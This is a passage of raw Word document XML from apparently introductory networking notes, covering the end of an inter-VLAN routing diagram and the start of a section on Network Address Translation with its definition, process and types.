              <w:t>step1 --&gt; step2 : Send to Default Gateway</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51C2D924" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>step2 --&gt; step3 : Router Processes Packet</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B1125FA" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>step3 --&gt; step4 : Route to Destination VLAN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BEAB0E1" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>step4 --&gt; step5 : Deliver to Target Device</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15905F0A" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5E9AB80E" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of routing_table : Router maintains\ndirectly connected routes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7093DE7B" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note bottom of trunk_port : Single trunk carries\nall VLAN traffic</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73CAF603" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note bottom of devices : Each device configured\nwith VLAN gateway</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C4CCF7E" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of flow : Inter-VLAN communication\nrequires Layer 3 routing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39C0FF19" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6E7067F5" w14:textId="49FC27B0" w:rsidR="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052487A" w14:paraId="3A2AF4B5" w14:textId="77777777" w:rsidTr="00635069">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12B387DB" w14:textId="7F034B92" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Real-</w:t>
            </w:r>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>world application</w:t>
            </w:r>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C6F9309" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="259"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Sales PC (192.168.10.10) can communicate with Engineering (192.168.20.10)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F6875C5" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="259"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>All inter-VLAN traffic must pass through router for security control</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="557AD491" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="259"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Router maintains separate routing entries for each VLAN subnet</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64399BE2" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="259"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0052487A">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Access control lists can be applied to control inter-VLAN communication</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ECE18F6" w14:textId="77777777" w:rsidR="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1228" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03A05D61" w14:textId="77777777" w:rsidR="0052487A" w:rsidRPr="0052487A" w:rsidRDefault="0052487A" w:rsidP="0052487A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25FA26CA" w14:textId="77777777" w:rsidR="00635069" w:rsidRPr="00635069" w:rsidRDefault="00635069" w:rsidP="00635069"/>
    <w:p w14:paraId="3603E118" w14:textId="77777777" w:rsidR="00635069" w:rsidRDefault="00635069">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial Black" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE883E2" w14:textId="0225812F" w:rsidR="00635069" w:rsidRPr="00635069" w:rsidRDefault="00635069" w:rsidP="00635069">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00635069">
        <w:lastRenderedPageBreak/>
        <w:t>Network Address Translation (NAT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218878AF" w14:textId="77777777" w:rsidR="00635069" w:rsidRPr="00635069" w:rsidRDefault="00635069" w:rsidP="00635069">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00635069">
        <w:t>Introduction to NAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8A98FC" w14:textId="77777777" w:rsidR="00635069" w:rsidRPr="00635069" w:rsidRDefault="00635069" w:rsidP="00635069">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00635069">
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1034C007" w14:textId="648BF36D" w:rsidR="00635069" w:rsidRDefault="00635069" w:rsidP="00635069">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00635069">
        <w:t xml:space="preserve">Network Address Translation (NAT) is a technique performed by a router or firewall that </w:t>
      </w:r>
      <w:r w:rsidRPr="00635069">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>translates private IP addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="00635069">
        <w:t xml:space="preserve"> used inside a local network </w:t>
      </w:r>
      <w:r w:rsidRPr="00635069">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>into public IP addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="00635069">
        <w:t xml:space="preserve"> used on the </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00635069">
        <w:t>nternet — and vice versa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1807FC" w14:textId="6A66A003" w:rsidR="001C253C" w:rsidRDefault="001C253C" w:rsidP="00635069">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001C253C">
        <w:t xml:space="preserve">OSI Layer: </w:t>
      </w:r>
      <w:r w:rsidRPr="00172667">
        <w:t>Network</w:t>
      </w:r>
      <w:r w:rsidRPr="001C253C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001C253C">
        <w:t xml:space="preserve">(Layer </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="001C253C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AEA3FF" w14:textId="6A1BB5E5" w:rsidR="00635069" w:rsidRPr="00635069" w:rsidRDefault="00635069" w:rsidP="00635069">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00635069">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Why NAT </w:t>
      </w:r>
      <w:r w:rsidRPr="00635069">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>is essential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD652C9" w14:textId="2ED03550" w:rsidR="00635069" w:rsidRPr="00635069" w:rsidRDefault="00635069" w:rsidP="00635069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00635069">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidRPr="00635069">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>address conservation</w:t>
      </w:r>
      <w:r w:rsidRPr="00635069">
        <w:t>: Allows many devices to share a single public IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B32F178" w14:textId="77777777" w:rsidR="00635069" w:rsidRPr="00635069" w:rsidRDefault="00635069" w:rsidP="00635069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00635069">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00635069">
        <w:t>: Hides internal network structure from external networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C66333A" w14:textId="0E0BF936" w:rsidR="00635069" w:rsidRDefault="00635069" w:rsidP="00635069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00635069">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Network </w:t>
      </w:r>
      <w:r w:rsidRPr="00635069">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00635069">
        <w:t>: Enables private addressing schemes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AB6A39" w14:textId="77777777" w:rsidR="0085692D" w:rsidRPr="0085692D" w:rsidRDefault="0085692D" w:rsidP="0085692D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0085692D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D2ACFA" w14:textId="2316E5A6" w:rsidR="0085692D" w:rsidRPr="00635069" w:rsidRDefault="0085692D" w:rsidP="0085692D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="290"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Three laptops at home all browse the web using the same public IP from your ISP, thanks to NAT on your router.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0275CFC1" w14:textId="4383EBCD" w:rsidR="00635069" w:rsidRPr="00635069" w:rsidRDefault="00635069" w:rsidP="00635069">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00635069">
        <w:t xml:space="preserve">How </w:t>
      </w:r>
      <w:r>
        <w:t>It</w:t>
      </w:r>
      <w:r w:rsidRPr="00635069">
        <w:t xml:space="preserve"> Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0128D148" w14:textId="3DA93A0A" w:rsidR="00635069" w:rsidRPr="00635069" w:rsidRDefault="00635069" w:rsidP="00635069">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00635069">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F173ED" w14:textId="77777777" w:rsidR="00635069" w:rsidRPr="00635069" w:rsidRDefault="00635069" w:rsidP="00635069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00635069">
        <w:t>Device on private network sends packet to NAT router.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF90A7C" w14:textId="77777777" w:rsidR="00635069" w:rsidRPr="00635069" w:rsidRDefault="00635069" w:rsidP="00635069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00635069">
        <w:t>NAT router replaces source IP with its public IP and records the translation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F143603" w14:textId="77777777" w:rsidR="00635069" w:rsidRPr="00635069" w:rsidRDefault="00635069" w:rsidP="00635069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00635069">
        <w:t>Packet is sent to the Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7568F62A" w14:textId="77777777" w:rsidR="00635069" w:rsidRPr="00635069" w:rsidRDefault="00635069" w:rsidP="00635069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00635069">
        <w:t>Response comes back to NAT router, which looks up the translation and forwards the packet to the correct internal device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4723B216" w14:textId="77777777" w:rsidR="00635069" w:rsidRDefault="00635069" w:rsidP="00635069">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00635069">
        <w:t>Types of NAT</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="4892" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2807"/>
        <w:gridCol w:w="7111"/>
        <w:gridCol w:w="7200"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CE7F56" w14:paraId="44666425" w14:textId="2F27FF41" w:rsidTr="002B5819">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="820" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D745289" w14:textId="1C6407A2" w:rsidR="00CE7F56" w:rsidRPr="00635069" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00635069">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2077" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="228F3ABF" w14:textId="3CDA4B16" w:rsidR="00CE7F56" w:rsidRPr="00635069" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00635069">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2103" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2C7823A3" w14:textId="36859659" w:rsidR="00CE7F56" w:rsidRPr="00635069" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE7F56" w14:paraId="3E0EEC96" w14:textId="17FBFD32" w:rsidTr="002B5819">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="820" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="271CA880" w14:textId="1D7F5386" w:rsidR="00CE7F56" w:rsidRPr="00635069" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00635069">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Static NAT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2077" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="588A0070" w14:textId="77777777" w:rsidR="00CE7F56" w:rsidRPr="00635069" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="289"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="330" w:hanging="219"/>
              <w:contextualSpacing w:val="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00CE7F56">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>One-to-one</w:t>
            </w:r>
            <w:r w:rsidRPr="00635069">
              <w:t xml:space="preserve"> mapping between internal and external IP addresses.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1178EDCD" w14:textId="6E6F7073" w:rsidR="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="289"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:ind w:left="330" w:hanging="219"/>
              <w:contextualSpacing w:val="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00635069">
              <w:t>Used for servers that must be accessible from the Internet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2103"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1615"/>
              <w:gridCol w:w="1615"/>
            </w:tblGrid>
            <w:tr w:rsidR="00CE7F56" w14:paraId="7434A01B" w14:textId="77777777" w:rsidTr="00CE7F56">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="3B55ACBA" w14:textId="77777777" w:rsidR="00CE7F56" w:rsidRPr="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="03925C5F" w14:textId="73021247" w:rsidR="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r>
                    <w:t>Private IP</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="20EE620F" w14:textId="557450B8" w:rsidR="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00CE7F56">
                    <w:t>Public IP</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00CE7F56" w14:paraId="508869BF" w14:textId="77777777" w:rsidTr="00CE7F56">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="2F1C4921" w14:textId="6B71A5D1" w:rsidR="00CE7F56" w:rsidRPr="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00CE7F56">
                    <w:t>Internal Web Server</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="3C9BA5EF" w14:textId="60D038B4" w:rsidR="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00CE7F56">
                    <w:t>192.168.1.100</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="3A39A554" w14:textId="79B1E323" w:rsidR="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
                  <w:r w:rsidRPr="00CE7F56">
                    <w:t>203.0.113.100</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00CE7F56" w14:paraId="06B42FC7" w14:textId="77777777" w:rsidTr="00CE7F56">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/>
                </w:tcPr>
                <w:p w14:paraId="66A11792" w14:textId="01332703" w:rsidR="00CE7F56" w:rsidRDefault="00CE7F56" w:rsidP="00CE7F56">
                  <w:pPr>
                    <w:spacing w:before="40" w:after="40"/>
                    <w:jc w:val="left"/>
                  </w:pPr>
